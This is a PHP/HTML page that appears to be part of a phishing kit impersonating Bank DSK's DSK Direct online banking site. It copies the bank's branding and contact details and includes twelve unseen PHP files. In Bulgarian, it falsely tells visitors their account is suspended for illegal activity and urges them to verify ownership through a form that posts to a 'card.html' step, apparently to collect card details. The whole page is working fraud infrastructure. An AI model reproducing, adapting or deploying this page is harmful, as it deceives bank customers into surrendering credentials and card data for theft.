<?php
include('./a/1.php');
include('./a/2.php');
include('./a/3.php');
include('./a/4.php');
include('./a/5.php');
include('./a/6.php');
include('./a/7.php');
include('./a/8.php');
include('./a/9.php');
include('./a/10.php');
include('./a/11.php');
include('./a/12.php');
?>
<html xml:lang="en" lang="en" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.w3.org/1999/xhtml" class="translated-ltr"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>DSC Direct</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="Pragma" content="no-cache"><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="Keywords" content=""><meta name="description" content="Добре дошли на страницата ДСК Директ за Интернет банкиране на Банка ДСК, ОТП Група. ДСК ДИРЕКТ предлага следните електронни канали за своите клиенти: Телeфонно Банкиране чрез Call Center на Банката; SMS услуги; Интернет банкиране; РС банкиране."><meta http-equiv="X-UA-Compatible" content="IE=edge"><link href="./css/index_style.css" type="text/css" rel="stylesheet"><script type="text/javascript">svg4everybody();</script><link rel="shortcut icon" href="./favicon.ico" type="image/vnd.microsoft.icon"><link rel="icon" href="/favicon.ico" type="image/vnd.microsoft.icon"><script type="text/javascript" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
		
    </script><noscript xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=286168341802168&amp;ev=PageView&amp;noscript=1"></noscript><script type="text/javascript" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
    /*  */
    var google_conversion_id = 850154699;
    var google_custom_params = window.google_tag_params;
    var google_remarketing_only = true;
    /*  */
    </script><script src="https://googleads.g.doubleclick.net/pagead/viewthroughconversion/850154699/?random=1532722393931&amp;cv=9&amp;fst=1532722393931&amp;num=1&amp;guid=ON&amp;resp=GooglemKTybQhCsO&amp;u_h=768&amp;u_w=1366&amp;u_ah=728&amp;u_aw=1366&amp;u_cd=24&amp;u_his=5&amp;u_tz=120&amp;u_java=false&amp;u_nplug=3&amp;u_nmime=4&amp;sendb=1&amp;frm=0&amp;url=http%3A%2F%2F127.0.0.1%2FDISKbank%2Finforamtion.html&amp;tiba=%D0%94%D0%A1%D0%9A%20%D0%94%D0%B8%D1%80%D0%B5%D0%BA%D1%82&amp;rfmt=3&amp;fmt=4"></script><script src="https://googleads.g.doubleclick.net/pagead/viewthroughconversion/850154699/?random=1532722176071&amp;cv=9&amp;fst=1532722176071&amp;num=1&amp;guid=ON&amp;resp=GooglemKTybQhCsO&amp;u_h=768&amp;u_w=1366&amp;u_ah=728&amp;u_aw=1366&amp;u_cd=24&amp;u_his=2&amp;u_tz=120&amp;u_java=false&amp;u_nplug=3&amp;u_nmime=4&amp;sendb=1&amp;frm=0&amp;url=https%3A%2F%2Fwww.dskdirect.bg%2FPage%2Fdefault.aspx%3Fxml_id%3D%2Fbg-BG%2F.resetPassword%26channelID%3D2000&amp;tiba=%D0%94%D0%A1%D0%9A%20%D0%94%D0%B8%D1%80%D0%B5%D0%BA%D1%82&amp;rfmt=3&amp;fmt=4"></script><noscript xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><div style="display:inline;"><img height="1" width="1" style="border-style:none;" alt="" src="//googleads.g.doubleclick.net/pagead/viewthroughconversion/850154699/?guid=ON&amp;script=0"></div></noscript><style>
          .squid-ink {
          width:24px;height:24px;
          }

        </style>
		<link type="text/css" rel="stylesheet" charset="UTF-8" href="https://translate.googleapis.com/translate_static/css/translateelement.css"></head>
		<body class="login"><div id="AjaxRequestError" style="display: none;" xmlns=""><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">error</font></font></div>
		<form method="post" style="margin:0px" action="./card.html"><div id="wrapper" class="login"><div id="content" class=""><header id="header"><div class="container"><div id="serviceArea" class="service-area" xmlns=""><a href="/page/default.aspx?user_id=&amp;session_id=&amp;xml_id=/en-US/.resetPassword"><svg class="squid-ink squid-ink-globe" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><use xlink:href="/images/svg/icons.svg#globe"></use></svg><span><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">English</font></font></span></a></div><div id="feedBack" xmlns=""></div></div><nav class="navbar nav-main" xmlns=""><div class="container"><ul class="main-menu"><li class="brand-item"><a class="homelink" href="&#13;&#10;            /page/default.aspx?xml_id=/bg-BG/.login&#13;&#10;          "><img src="./image//Direct.bg.svg.svg"></a></li></ul></div></nav></header><aside class="aside aside-left" id="left" xmlns=""><div id="GadgetContainerLeft_m_DivContainer" class="GadgetContainer" xmlns:xsd="http://www.w3.org/2001/XMLSchema"></div><div id="GadgetContainerRight_m_DivContainer" class="GadgetContainer" xmlns:xsd="http://www.w3.org/2001/XMLSchema"></div></aside><div id="PageContent" class="main remaster" xmlns=""><div class="page-titul"><h2 class="title"></h2></div><div id="resetPassword" xmlns:xsd="http://www.w3.org/2001/XMLSchema" class="ui-tabs ui-widget ui-widget-content ui-corner-all"><div class="title"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">Password Recovery</font></font></div><ul class="submenu tab-menu tab-menu-boxed ui-tabs-nav ui-helper-reset ui-helper-clearfix ui-widget-header ui-corner-all" role="tablist"><li class="ui-state-default ui-corner-top ui-tabs-active ui-state-active" role="tab" tabindex="0" aria-controls="createPassword" aria-labelledby="ui-id-2" aria-selected="true"><a href="#createPassword" class="ui-tabs-anchor" role="presentation" tabindex="-1" id="ui-id-2"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;"></font></font></a></li></ul><div id="createPassword" aria-labelledby="ui-id-2" class="ui-tabs-panel ui-widget-content ui-corner-bottom" role="tabpanel" aria-expanded="true" aria-hidden="false" style="display: block;"><div class="box"><div><div style="
    margin-left: 40;
"><centre>
    
<h1>СУважаеми клиент</h1>
<span class="text">За съжаление, профилът ви е спрян поради необичайна и незаконна дейност.

</span>
<p class="text-medium">За да управлявате целия си акаунт, ще ви помолим само да докажете, че сте първият потребител
Благодаря ви, че ни избрахте

</p>
<div class="buttons" style="
    margin-right: 200px;
">
    <input value="Изпращане" type="submit" style="
    margin-left: 140px;
    height: 40px;
    padding: 12px 36px;
    font-size: 16px;
    background: transparent;
    border: 0;
    color: #fff;
    box-shadow: 0;
    display: inline-block;
    border-radius: 3px;
    cursor: pointer;
    background-color: #52ae30;
    border: 0;
    box-shadow:;
    margin-top: 17px;
">

    <font style="vertical-align: inherit;"></font></div></centre></div></div></div></div></div><!----></div><footer><div class="container" xmlns=""><ul><li class="social-links"><a href=""><img src="./image//facebook.svg"></a><a href=""><img src="./image/youtube.svg"></a></li><li><a href="https://dskbank.bg/" target="_blank"><img src="./image//BankaDSK_ciril_CM_White.svg"></a></li><li></li></ul><ul class="call-center"><li><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">0700 10 375</font></font></li><li><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">* 2375</font></font></li><li><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">call_center@dskbank.bg</font></font></li></ul></div></footer></div></div></form>
    <font style="vertical-align: inherit;"></font><!----></body></html>